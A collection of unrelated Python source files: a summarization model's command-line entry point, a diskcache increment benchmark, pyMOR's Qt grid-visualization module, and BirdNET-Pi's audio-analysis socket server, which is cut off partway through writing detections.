parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/cnndm.log')
parser.add_argument('-dataset', default='')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-test_from", default='')
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
args = parser.parse_args()
args.gpu_ranks = [int(i) for i in args.gpu_ranks.split(',')]
os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if(args.world_size>1):
multi_main(args)
elif (args.mode == 'train'):
train(args, device_id)
elif (args.mode == 'validate'):
wait_and_validate(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
elif (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test(args, device_id, cp, step)
|
benchmark_incr.py
|
"""Benchmark cache.incr method.
"""
from __future__ import print_function
import json
import multiprocessing as mp
import shutil
import time
import diskcache as dc
from .utils import secs
COUNT = int(1e3)
PROCS = 8
def worker(num):
"Rapidly increment key and time operation."
time.sleep(0.1) # Let other workers start.
cache = dc.Cache('tmp')
values = []
for _ in range(COUNT):
start = time.time()
cache.incr(b'key')
end = time.time()
values.append(end - start)
with open('output-%s.json' % num, 'w') as writer:
json.dump(values, writer)
def main():
"Run workers and print percentile results."
shutil.rmtree('tmp', ignore_errors=True)
processes = [
mp.Process(target=worker, args=(num,)) for num in range(PROCS)
]
for process in processes:
process.start()
for process in processes:
process.join()
with dc.Cache('tmp') as cache:
assert cache.get(b'key') == COUNT * PROCS
for num in range(PROCS):
values = []
with open('output-%s.json' % num) as reader:
values += json.load(reader)
values.sort()
p50 = int(len(values) * 0.50) - 1
p90 = int(len(values) * 0.90) - 1
p99 = int(len(values) * 0.99) - 1
p00 = len(values) - 1
print(['{0:9s}'.format(val) for val in 'p50 p90 p99 max'.split()])
print([secs(values[pos]) for pos in [p50, p90, p99, p00]])
if __name__ == '__main__':
main()
|
qt.py
|
# This file is part of the pyMOR project (http://www.pymor.org).
# Copyright Holders: Rene Milk, Stephan Rave, Felix Schindler
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
#
# Contributors: Andreas Buhr <andreas@andreasbuhr.de>
# Michael Schaefer <michael.schaefer@uni-muenster.de>
""" This module provides a few methods and classes for visualizing data
associated to grids. We use the `PySide <http://www.pyside.org>`_ bindings
for the `Qt <http://www.qt-project.org>`_ widget toolkit for the GUI.
"""
from __future__ import absolute_import, division, print_function
from itertools import izip
import math as m
import numpy as np
try:
from PySide.QtGui import (QWidget, QVBoxLayout, QHBoxLayout, QGridLayout, QSlider, QApplication, QLCDNumber,
QAction, QStyle, QToolBar, QLabel, QFileDialog, QMessageBox)
from PySide.QtCore import Qt, QCoreApplication, QTimer
HAVE_PYSIDE = True
except ImportError:
HAVE_PYSIDE = False
import multiprocessing
import os
import signal
import time
from pymor.core.defaults import defaults
from pymor.core.interfaces import BasicInterface
from pymor.core.logger import getLogger
from pymor.grids.oned import OnedGrid
from pymor.grids.rect import RectGrid
from pymor.grids.tria import TriaGrid
from pymor.gui.gl import GLPatchWidget, ColorBarWidget, HAVE_GL
from pymor.gui.matplotlib import Matplotlib1DWidget, MatplotlibPatchWidget, HAVE_MATPLOTLIB
from pymor.tools.vtkio import HAVE_PYVTK, write_vtk
from pymor.vectorarrays.interfaces import VectorArrayInterface
from pymor.vectorarrays.numpy import NumpyVectorArray
if HAVE_PYSIDE:
class PlotMainWindow(QWidget):
"""Base class for plot main windows."""
def __init__(self, U, plot, length=1, title=None):
super(PlotMainWindow, self).__init__()
layout = QVBoxLayout()
if title:
title = QLabel('<b>' + title + '</b>')
title.setAlignment(Qt.AlignHCenter)
layout.addWidget(title)
layout.addWidget(plot)
plot.set(U, 0)
if length > 1:
hlayout = QHBoxLayout()
self.slider = QSlider(Qt.Horizontal)
self.slider.setMinimum(0)
self.slider.setMaximum(length - 1)
self.slider.setTickPosition(QSlider.TicksBelow)
hlayout.addWidget(self.slider)
lcd = QLCDNumber(m.ceil(m.log10(length)))
lcd.setDecMode()
lcd.setSegmentStyle(QLCDNumber.Flat)
hlayout.addWidget(lcd)
layout.addLayout(hlayout)
hlayout = QHBoxLayout()
toolbar = QToolBar()
self.a_play = QAction(self.style().standardIcon(QStyle.SP_MediaPlay), 'Play', self)
self.a_play.setCheckable(True)
self.a_rewind = QAction(self.style().standardIcon(QStyle.SP_MediaSeekBackward), 'Rewind', self)
self.a_toend = QAction(self.style().standardIcon(QStyle.SP_MediaSeekForward), 'End', self)
self.a_step_backward = QAction(self.style().standardIcon(QStyle.SP_MediaSkipBackward),
'Step Back', self)
self.a_step_forward = QAction(self.style().standardIcon(QStyle.SP_MediaSkipForward), 'Step', self)
self.a_loop = QAction(self.style().standardIcon(QStyle.SP_BrowserReload), 'Loop', self)
self.a_loop.setCheckable(True)
toolbar.addAction(self.a_play)
toolbar.addAction(self.a_rewind)
toolbar.addAction(self.a_toend)
toolbar.addAction(self.a_step_backward)
toolbar.addAction(self.a_step_forward)
toolbar.addAction(self.a_loop)
if hasattr(self, 'save'):
self.a_save = QAction(self.style().standardIcon(QStyle.SP_DialogSaveButton), 'Save', self)
toolbar.addAction(self.a_save)
self.a_save.triggered.connect(self.save)
hlayout.addWidget(toolbar)
self.speed = QSlider(Qt.Horizontal)
self.speed.setMinimum(0)
self.speed.setMaximum(100)
hlayout.addWidget(QLabel('Speed:'))
hlayout.addWidget(self.speed)
layout.addLayout(hlayout)
self.timer = QTimer()
self.timer.timeout.connect(self.update_solution)
self.slider.valueChanged.connect(self.slider_changed)
self.slider.valueChanged.connect(lcd.display)
self.speed.valueChanged.connect(self.speed_changed)
self.a_play.toggled.connect(self.toggle_play)
self.a_rewind.triggered.connect(self.rewind)
self.a_toend.triggered.connect(self.to_end)
self.a_step_forward.triggered.connect(self.step_forward)
self.a_step_backward.triggered.connect(self.step_backward)
self.speed.setValue(50)
elif hasattr(self, 'save'):
hlayout = QHBoxLayout()
toolbar = QToolBar()
self.a_save = QAction(self.style().standardIcon(QStyle.SP_DialogSaveButton), 'Save', self)
toolbar.addAction(self.a_save)
hlayout.addWidget(toolbar)
layout.addLayout(hlayout)
self.a_save.triggered.connect(self.save)
self.setLayout(layout)
self.plot = plot
self.U = U
self.length = length
def slider_changed(self, ind):
self.plot.set(self.U, ind)
def speed_changed(self, val):
self.timer.setInterval(val * 20)
def update_solution(self):
ind = self.slider.value() + 1
if ind >= self.length:
if self.a_loop.isChecked():
ind = 0
else:
self.a_play.setChecked(False)
return
self.slider.setValue(ind)
def toggle_play(self, checked):
if checked:
if self.slider.value() + 1 == self.length:
self.slider.setValue(0)
self.timer.start()
else:
self.timer.stop()
def rewind(self):
self.slider.setValue(0)
def to_end(self):
self.a_play.setChecked(False)
self.slider.setValue(self.length - 1)
def step_forward(self):
self.a_play.setChecked(False)
ind = self.slider.value() + 1
if ind == self.length and self.a_loop.isChecked():
ind = 0
if ind < self.length:
self.slider.setValue(ind)
def step_backward(self):
self.a_play.setChecked(False)
ind = self.slider.value() - 1
if ind == -1 and self.a_loop.isChecked():
ind = self.length - 1
if ind >= 0:
self.slider.setValue(ind)
_launch_qt_app_pids = set()
def _launch_qt_app(main_window_factory, block):
"""Wrapper to display plot in a separate process."""
def doit():
try:
app = QApplication([])
except RuntimeError:
app = QCoreApplication.instance()
main_window = main_window_factory()
main_window.show()
app.exec_()
if block:
doit()
else:
p = multiprocessing.Process(target=doit)
p.start()
_launch_qt_app_pids.add(p.pid)
if block:
p.join()
def stop_gui_processes():
for p in multiprocessing.active_children():
if p.pid in _launch_qt_app_pids:
p.terminate()
waited = 0
while any(p.pid in _launch_qt_app_pids for p in multiprocessing.active_children()):
time.sleep(1)
waited += 1
if waited == 5:
break
for p in multiprocessing.active_children():
if p.pid in _launch_qt_app_pids:
try:
os.kill(p.pid, signal.SIGKILL)
except OSError:
pass
@defaults('backend', sid_ignore=('backend',))
def visualize_patch(grid, U, bounding_box=([0, 0], [1, 1]), codim=2, title=None, legend=None,
separate_colorbars=False, rescale_colorbars=False, backend='gl', block=False, columns=2):
"""Visualize scalar data associated to a two-dimensional |Grid| as a patch plot.
The grid's |ReferenceElement| must be the triangle or square. The data can either
be attached to the faces or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case a subplot is created for each entry of the tuple. The
lengths of all arrays have to agree.
bounding_box
A bounding box in which the grid is contained.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 2).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
separate_colorbars
If `True`, use separate colorbars for each subplot.
rescale_colorbars
If `True`, rescale colorbars to data in each frame.
backend
Plot backend to use ('gl' or 'matplotlib').
block
If `True`, block execution until the plot window is closed.
columns
The number of columns in the visualizer GUI in case multiple plots are displayed
at the same time.
"""
if not HAVE_PYSIDE:
raise ImportError('cannot visualize: import of PySide failed')
assert backend in {'gl', 'matplotlib'}
if backend == 'gl':
if not HAVE_GL:
raise ImportError('cannot visualize: import of PyOpenGL failed')
else:
if not HAVE_MATPLOTLIB:
raise ImportError('cannot visualize: import of matplotlib failed')
# TODO extract class
class MainWindow(PlotMainWindow):
def __init__(self, grid, U, bounding_box, codim, title, legend, separate_colorbars, rescale_colorbars, backend):
assert isinstance(U, VectorArrayInterface) and hasattr(U, 'data') \
or (isinstance(U, tuple) and all(isinstance(u, VectorArrayInterface) and hasattr(u, 'data') for u in U)
and all(len(u) == len(U[0]) for u in U))
U = (U.data,) if hasattr(U, 'data') else tuple(u.data for u in U)
if isinstance(legend, str):
legend = (legend,)
assert legend is None or isinstance(legend, tuple) and len(legend) == len(U)
if backend == 'gl':
widget = GLPatchWidget
else:
widget = MatplotlibPatchWidget
if not separate_colorbars and len(U) > 1:
l = getLogger('pymor.gui.qt.visualize_patch')
l.warn('separate_colorbars=False not supported for matplotlib backend')
separate_colorbars = True
class PlotWidget(QWidget):
def __init__(self):
super(PlotWidget, self).__init__()
if separate_colorbars:
if rescale_colorbars:
self.vmins = tuple(np.min(u[0]) for u in U)
self.vmaxs = tuple(np.max(u[0]) for u in U)
else:
self.vmins = tuple(np.min(u) for u in U)
self.vmaxs = tuple(np.max(u) for u in U)
else:
if rescale_colorbars:
self.vmins = (min(np.min(u[0]) for u in U),) * len(U)
self.vmaxs = (max(np.max(u[0]) for u in U),) * len(U)
else:
self.vmins = (min(np.min(u) for u in U),) * len(U)
self.vmaxs = (max(np.max(u) for u in U),) * len(U)
layout = QHBoxLayout()
plot_layout = QGridLayout()
self.colorbarwidgets = [ColorBarWidget(self, vmin=vmin, vmax=vmax)
for vmin, vmax in izip(self.vmins, self.vmaxs)]
plots = [widget(self, grid, vmin=vmin, vmax=vmax, bounding_box=bounding_box, codim=codim)
for vmin, vmax in izip(self.vmins, self.vmaxs)]
if legend:
for i, plot, colorbar, l in izip(xrange(len(plots)), plots, self.colorbarwidgets, legend):
subplot_layout = QVBoxLayout()
caption = QLabel(l)
caption.setAlignment(Qt.AlignHCenter)
subplot_layout.addWidget(caption)
if not separate_colorbars or backend == 'matplotlib':
subplot_layout.addWidget(plot)
else:
hlayout = QHBoxLayout()
hlayout.addWidget(plot)
hlayout.addWidget(colorbar)
subplot_layout.addLayout(hlayout)
plot_layout.addLayout(subplot_layout, int(i/columns), (i % columns), 1, 1)
else:
for i, plot, colorbar in izip(xrange(len(plots)), plots, self.colorbarwidgets):
if not separate_colorbars or backend == 'matplotlib':
plot_layout.addWidget(plot, int(i/columns), (i % columns), 1, 1)
else:
hlayout = QHBoxLayout()
hlayout.addWidget(plot)
hlayout.addWidget(colorbar)
plot_layout.addLayout(hlayout, int(i/columns), (i % columns), 1, 1)
layout.addLayout(plot_layout)
if not separate_colorbars:
layout.addWidget(self.colorbarwidgets[0])
for w in self.colorbarwidgets[1:]:
w.setVisible(False)
self.setLayout(layout)
self.plots = plots
def set(self, U, ind):
if rescale_colorbars:
if separate_colorbars:
self.vmins = tuple(np.min(u[ind]) for u in U)
self.vmaxs = tuple(np.max(u[ind]) for u in U)
else:
self.vmins = (min(np.min(u[ind]) for u in U),) * len(U)
self.vmaxs = (max(np.max(u[ind]) for u in U),) * len(U)
for u, plot, colorbar, vmin, vmax in izip(U, self.plots, self.colorbarwidgets, self.vmins,
self.vmaxs):
plot.set(u[ind], vmin=vmin, vmax=vmax)
colorbar.set(vmin=vmin, vmax=vmax)
super(MainWindow, self).__init__(U, PlotWidget(), title=title, length=len(U[0]))
self.grid = grid
self.codim = codim
def save(self):
if not HAVE_PYVTK:
msg = QMessageBox(QMessageBox.Critical, 'Error', 'VTK output disabled. Pleas install pyvtk.')
msg.exec_()
return
filename = QFileDialog.getSaveFileName(self, 'Save as vtk file')[0]
base_name = filename.split('.vtu')[0].split('.vtk')[0].split('.pvd')[0]
if base_name:
if len(self.U) == 1:
write_vtk(self.grid, NumpyVectorArray(self.U[0], copy=False), base_name, codim=self.codim)
else:
for i, u in enumerate(self.U):
write_vtk(self.grid, NumpyVectorArray(u, copy=False), '{}-{}'.format(base_name, i),
codim=self.codim)
_launch_qt_app(lambda: MainWindow(grid, U, bounding_box, codim, title=title, legend=legend,
separate_colorbars=separate_colorbars, rescale_colorbars=rescale_colorbars,
backend=backend),
block)
def visualize_matplotlib_1d(grid, U, codim=1, title=None, legend=None, separate_plots=False, block=False):
"""Visualize scalar data associated to a one-dimensional |Grid| as a plot.
The grid's |ReferenceElement| must be the line. The data can either
be attached to the subintervals or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case several plots are made into the same axes. The
lengths of all arrays have to agree.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 1).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
separate_plots
If `True`, use subplots to visualize multiple |VectorArrays|.
block
If `True`, block execution until the plot window is closed.
"""
if not HAVE_PYSIDE:
raise ImportError('cannot visualize: import of PySide failed')
if not HAVE_MATPLOTLIB:
raise ImportError('cannot visualize: import of matplotlib failed')
class MainWindow(PlotMainWindow):
def __init__(self, grid, U, codim, title, legend, separate_plots):
assert isinstance(U, VectorArrayInterface) and hasattr(U, 'data') \
or (isinstance(U, tuple) and all(isinstance(u, VectorArrayInterface) and hasattr(u, 'data') for u in U)
and all(len(u) == len(U[0]) for u in U))
U = (U.data,) if hasattr(U, 'data') else tuple(u.data for u in U)
if isinstance(legend, str):
legend = (legend,)
assert legend is None or isinstance(legend, tuple) and len(legend) == len(U)
plot_widget = Matplotlib1DWidget(None, grid, count=len(U), vmin=[np.min(u) for u in U],
vmax=[np.max(u) for u in U], legend=legend, codim=codim,
separate_plots=separate_plots)
super(MainWindow, self).__init__(U, plot_widget, title=title, length=len(U[0]))
self.grid = grid
_launch_qt_app(lambda: MainWindow(grid, U, codim, title=title, legend=legend, separate_plots=separate_plots), block)
class PatchVisualizer(BasicInterface):
"""Visualize scalar data associated to a two-dimensional |Grid| as a patch plot.
The grid's |ReferenceElement| must be the triangle or square. The data can either
be attached to the faces or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
bounding_box
A bounding box in which the grid is contained.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 2).
backend
Plot backend to use ('gl' or 'matplotlib').
block
If `True` block execution until the plot window is closed.
"""
def __init__(self, grid, bounding_box=([0, 0], [1, 1]), codim=2, backend=None, block=False):
assert isinstance(grid, (RectGrid, TriaGrid))
assert codim in (0, 2)
self.grid = grid
self.bounding_box = bounding_box
self.codim = codim
self.backend = backend
self.block = block
def visualize(self, U, discretization, title=None, legend=None, separate_colorbars=False,
rescale_colorbars=False, block=None, filename=None, columns=2):
"""Visualize the provided data.
Parameters
----------
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case a subplot is created for each entry of the tuple. The
lengths of all arrays have to agree.
discretization
Filled in :meth:`pymor.discretizations.DiscretizationBase.visualize` (ignored).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
separate_colorbars
If `True`, use separate colorbars for each subplot.
rescale_colorbars
If `True`, rescale colorbars to data in each frame.
block
If `True`, block execution until the plot window is closed. If `None`, use the
default provided during instantiation.
filename
If specified, write the data to a VTK-file using
:func:`pymor.tools.vtkio.write_vtk` instead of displaying it.
columns
The number of columns in the visualizer GUI in case multiple plots are displayed
at the same time.
"""
assert isinstance(U, VectorArrayInterface) and hasattr(U, 'data') \
or (isinstance(U, tuple) and all(isinstance(u, VectorArrayInterface) and hasattr(u, 'data') for u in U)
and all(len(u) == len(U[0]) for u in U))
if filename:
if not isinstance(U, tuple):
write_vtk(self.grid, U, filename, codim=self.codim)
else:
for i, u in enumerate(U):
write_vtk(self.grid, u, '{}-{}'.format(filename, i), codim=self.codim)
else:
block = self.block if block is None else block
visualize_patch(self.grid, U, bounding_box=self.bounding_box, codim=self.codim, title=title,
legend=legend, separate_colorbars=separate_colorbars, rescale_colorbars=rescale_colorbars,
backend=self.backend, block=block, columns=columns)
class Matplotlib1DVisualizer(BasicInterface):
"""Visualize scalar data associated to a one-dimensional |Grid| as a plot.
The grid's |ReferenceElement| must be the line. The data can either
be attached to the subintervals or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 1).
block
If `True`, block execution until the plot window is closed.
"""
def __init__(self, grid, codim=1, block=False):
assert isinstance(grid, OnedGrid)
assert codim in (0, 1)
self.grid = grid
self.codim = codim
self.block = block
def visualize(self, U, discretization, title=None, legend=None, block=None):
"""Visualize the provided data.
Parameters
----------
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case several plots are made into the same axes. The
lengths of all arrays have to agree.
discretization
Filled in :meth:`pymor.discretizations.DiscretizationBase.visualize` (ignored).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
block
If `True` block execution until the plot window is closed. If `None`, use the
default provided during instantiation.
"""
block = self.block if block is None else block
visualize_matplotlib_1d(self.grid, U, codim=self.codim, title=title, legend=legend, block=block)
|
server.py
|
import socket
import threading
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['CUDA_VISIBLE_DEVICES'] = ''
try:
import tflite_runtime.interpreter as tflite
except:
from tensorflow import lite as tflite
import argparse
import operator
import librosa
import numpy as np
import math
import time
from decimal import Decimal
import json
import requests
import sqlite3
import datetime
from time import sleep
import pytz
from tzlocal import get_localzone
from pathlib import Path
import apprise
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind(ADDR)
except:
print("Waiting on socket")
time.sleep(5)
# Open most recent Configuration and grab DB_PWD as a python variable
userDir = os.path.expanduser('~')
with open(userDir + '/BirdNET-Pi/scripts/thisrun.txt', 'r') as f:
this_run = f.readlines()
audiofmt = "." + str(str(str([i for i in this_run if i.startswith('AUDIOFMT')]).split('=')[1]).split('\\')[0])
priv_thresh = float("." + str(str(str([i for i in this_run if i.startswith('PRIVACY_THRESHOLD')]).split('=')[1]).split('\\')[0]))/10
def loadModel():
global INPUT_LAYER_INDEX
global OUTPUT_LAYER_INDEX
global MDATA_INPUT_INDEX
global CLASSES
print('LOADING TF LITE MODEL...', end=' ')
# Load TFLite model and allocate tensors.
modelpath = userDir + '/BirdNET-Pi/model/BirdNET_6K_GLOBAL_MODEL.tflite'
myinterpreter = tflite.Interpreter(model_path=modelpath,num_threads=2)
myinterpreter.allocate_tensors()
# Get input and output tensors.
input_details = myinterpreter.get_input_details()
output_details = myinterpreter.get_output_details()
# Get input tensor index
INPUT_LAYER_INDEX = input_details[0]['index']
MDATA_INPUT_INDEX = input_details[1]['index']
OUTPUT_LAYER_INDEX = output_details[0]['index']
# Load labels
CLASSES = []
labelspath = userDir + '/BirdNET-Pi/model/labels.txt'
with open(labelspath, 'r') as lfile:
for line in lfile.readlines():
CLASSES.append(line.replace('\n', ''))
print('DONE!')
return myinterpreter
def loadCustomSpeciesList(path):
slist = []
if os.path.isfile(path):
with open(path, 'r') as csfile:
for line in csfile.readlines():
slist.append(line.replace('\r', '').replace('\n', ''))
return slist
def splitSignal(sig, rate, overlap, seconds=3.0, minlen=1.5):
# Split signal with overlap
sig_splits = []
for i in range(0, len(sig), int((seconds - overlap) * rate)):
split = sig[i:i + int(seconds * rate)]
# End of signal?
if len(split) < int(minlen * rate):
break
# Signal chunk too short? Fill with zeros.
if len(split) < int(rate * seconds):
temp = np.zeros((int(rate * seconds)))
temp[:len(split)] = split
split = temp
sig_splits.append(split)
return sig_splits
def readAudioData(path, overlap, sample_rate=48000):
print('READING AUDIO DATA...', end=' ', flush=True)
# Open file with librosa (uses ffmpeg or libav)
sig, rate = librosa.load(path, sr=sample_rate, mono=True, res_type='kaiser_fast')
# Split audio into 3-second chunks
chunks = splitSignal(sig, rate, overlap)
print('DONE! READ', str(len(chunks)), 'CHUNKS.')
return chunks
def convertMetadata(m):
# Convert week to cosine
if m[2] >= 1 and m[2] <= 48:
m[2] = math.cos(math.radians(m[2] * 7.5)) + 1
else:
m[2] = -1
# Add binary mask
mask = np.ones((3,))
if m[0] == -1 or m[1] == -1:
mask = np.zeros((3,))
if m[2] == -1:
mask[2] = 0.0
return np.concatenate([m, mask])
def custom_sigmoid(x, sensitivity=1.0):
return 1 / (1.0 + np.exp(-sensitivity * x))
def predict(sample, sensitivity):
global INTERPRETER
# Make a prediction
INTERPRETER.set_tensor(INPUT_LAYER_INDEX, np.array(sample[0], dtype='float32'))
INTERPRETER.set_tensor(MDATA_INPUT_INDEX, np.array(sample[1], dtype='float32'))
INTERPRETER.invoke()
prediction = INTERPRETER.get_tensor(OUTPUT_LAYER_INDEX)[0]
# Apply custom sigmoid
p_sigmoid = custom_sigmoid(prediction, sensitivity)
# Get label and scores for pooled predictions
p_labels = dict(zip(CLASSES, p_sigmoid))
# Sort by score
p_sorted = sorted(p_labels.items(), key=operator.itemgetter(1), reverse=True)
# #print("DATABASE SIZE:", len(p_sorted))
# #print("HUMAN-CUTOFF AT:", int(len(p_sorted)*priv_thresh)/10)
#
# # Remove species that are on blacklist
human_cutoff = max(10,int(len(p_sorted)*priv_thresh))
for i in range(min(10, len(p_sorted))):
if p_sorted[i][0]=='Human_Human':
with open(userDir + '/BirdNET-Pi/HUMAN.txt', 'a') as rfile:
rfile.write(str(datetime.datetime.now())+str(p_sorted[i])+ ' ' + str(human_cutoff)+ '\n')
return p_sorted[:human_cutoff]
def analyzeAudioData(chunks, lat, lon, week, sensitivity, overlap,):
global INTERPRETER
detections = {}
start = time.time()
print('ANALYZING AUDIO...', end=' ', flush=True)
# Convert and prepare metadata
mdata = convertMetadata(np.array([lat, lon, week]))
mdata = np.expand_dims(mdata, 0)
# Parse every chunk
pred_start = 0.0
for c in chunks:
# Prepare as input signal
sig = np.expand_dims(c, 0)
# Make prediction
p = predict([sig, mdata], sensitivity)
# print("PPPPP",p)
HUMAN_DETECTED=False
#Catch if Human is recognized
for x in range(len(p)):
if "Human" in p[x][0]:
HUMAN_DETECTED=True
# Save result and timestamp
pred_end = pred_start + 3.0
#If human detected set all detections to human to make sure voices are not saved
if HUMAN_DETECTED == True:
p=[('Human_Human',0.0)]*10
detections[str(pred_start) + ';' + str(pred_end)] = p
pred_start = pred_end - overlap
print('DONE! Time', int((time.time() - start) * 10) / 10.0, 'SECONDS')
# print('DETECTIONS:::::',detections)
return detections
def sendAppriseNotifications(species,confidence):
if os.path.exists(userDir + '/BirdNET-Pi/apprise.txt') and os.path.getsize(userDir + '/BirdNET-Pi/apprise.txt') > 0:
with open(userDir + '/BirdNET-Pi/scripts/thisrun.txt', 'r') as f:
this_run = f.readlines()
title = str(str(str([i for i in this_run if i.startswith('APPRISE_NOTIFICATION_TITLE')]).split('=')[1]).split('\\')[0]).replace('"', '')
body = str(str(str([i for i in this_run if i.startswith('APPRISE_NOTIFICATION_BODY')]).split('=')[1]).split('\\')[0]).replace('"', '')
if str(str(str([i for i in this_run if i.startswith('APPRISE_NOTIFY_EACH_DETECTION')]).split('=')[1]).split('\\')[0]) == "1":
apobj = apprise.Apprise()
config = apprise.AppriseConfig()
config.add(userDir + '/BirdNET-Pi/apprise.txt')
apobj.add(config)
apobj.notify(
body=body.replace("$sciname",species.split("_")[0]).replace("$comname",species.split("_")[1]).replace("$confidence",confidence),
title=title,
)
def writeResultsToFile(detections, min_conf, path):
print('WRITING RESULTS TO', path, '...', end=' ')
rcnt = 0
with open(path, 'w') as rfile:
rfile.write('Start (s);End (s);Scientific name;Common name;Confidence\n')
for d in detections:
for entry in detections[d]:
if entry[1] >= min_conf and ((entry[0] in INCLUDE_LIST or len(INCLUDE_LIST) == 0) and (entry[0] not in EXCLUDE_LIST or len(EXCLUDE_LIST) == 0) ):
sendAppriseNotifications(str(entry[0]),str(entry[1]));
rfile.write(d + ';' + entry[0].replace('_', ';') + ';' + str(entry[1]) + '\n')
rcnt += 1
print('DONE! WROTE', rcnt, 'RESULTS.')
return
def handle_client(conn, addr):
global INCLUDE_LIST
global EXCLUDE_LIST
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
else:
#print(f"[{addr}] {msg}")
args = type('', (), {})()
args.i = ''
args.o = ''
args.birdweather_id = '99999'
args.include_list = 'null'
args.exclude_list = 'null'
args.overlap = 0.0
args.week = -1
args.sensitivity = 1.25
args.min_conf = 0.70
args.lat = -1
args.lon = -1
for line in msg.split('||'):
inputvars = line.split('=')
if inputvars[0] == 'i':
args.i = inputvars[1]
elif inputvars[0] == 'o':
args.o = inputvars[1]
elif inputvars[0] == 'birdweather_id':
args.birdweather_id = inputvars[1]
elif inputvars[0] == 'include_list':
args.include_list = inputvars[1]
elif inputvars[0] == 'exclude_list':
args.exclude_list = inputvars[1]
elif inputvars[0] == 'overlap':
args.overlap = float(inputvars[1])
elif inputvars[0] == 'week':
args.week = int(inputvars[1])
elif inputvars[0] == 'sensitivity':
args.sensitivity = float(inputvars[1])
elif inputvars[0] == 'min_conf':
args.min_conf = float(inputvars[1])
elif inputvars[0] == 'lat':
args.lat = float(inputvars[1])
elif inputvars[0] == 'lon':
args.lon = float(inputvars[1])
# Load custom species lists - INCLUDED and EXCLUDED
if not args.include_list == 'null':
INCLUDE_LIST = loadCustomSpeciesList(args.include_list)
else:
INCLUDE_LIST = []
if not args.exclude_list == 'null':
EXCLUDE_LIST = loadCustomSpeciesList(args.exclude_list)
else:
EXCLUDE_LIST = []
birdweather_id = args.birdweather_id
# Read audio data
audioData = readAudioData(args.i, args.overlap)
# Get Date/Time from filename in case Pi gets behind
#now = datetime.now()
full_file_name = args.i
print('FULL FILENAME: -' + full_file_name + '-')
file_name = Path(full_file_name).stem
file_date = file_name.split('-birdnet-')[0]
file_time = file_name.split('-birdnet-')[1]
date_time_str = file_date + ' ' + file_time
date_time_obj = datetime.datetime.strptime(date_time_str, '%Y-%m-%d %H:%M:%S')
#print('Date:', date_time_obj.date())
#print('Time:', date_time_obj.time())
print('Date-time:', date_time_obj)
now = date_time_obj
current_date = now.strftime("%Y-%m-%d")
current_time = now.strftime("%H:%M:%S")
current_iso8601 = now.astimezone(get_localzone()).isoformat()
week_number = int(now.strftime("%V"))
week = max(1, min(week_number, 48))
sensitivity = max(0.5, min(1.0 - (args.sensitivity - 1.0), 1.5))
# Process audio data and get detections
detections = analyzeAudioData(audioData, args.lat, args.lon, week, sensitivity, args.overlap)
# Write detections to output file
min_conf = max(0.01, min(args.min_conf, 0.99))
writeResultsToFile(detections, min_conf, args.o)
###############################################################################
###############################################################################
soundscape_uploaded = False
# Write detections to Database
myReturn = ''
for i in detections:
myReturn += str(i) + '-' + str(detections[i][0]) + '\n'
with open(userDir + '/BirdNET-Pi/BirdDB.txt', 'a') as rfile:
for d in detections:
for entry in detections[d]:
if entry[1] >= min_conf and ((entry[0] in INCLUDE_LIST or len(INCLUDE_LIST) == 0) and (entry[0] not in EXCLUDE_LIST or len(EXCLUDE_LIST) == 0) ):
rfile.write(str(current_date) + ';' + str(current_time) + ';' + entry[0].replace('_', ';') + ';' \
+ str(entry[1]) +";" + str(args.lat) + ';' + str(args.lon) + ';' + str(min_conf) + ';' + str(week) + ';' \
+ str(args.sensitivity) +';' + str(args.overlap) + '\n')
Date = str(current_date)
Time = str(current_time)
species = entry[0]
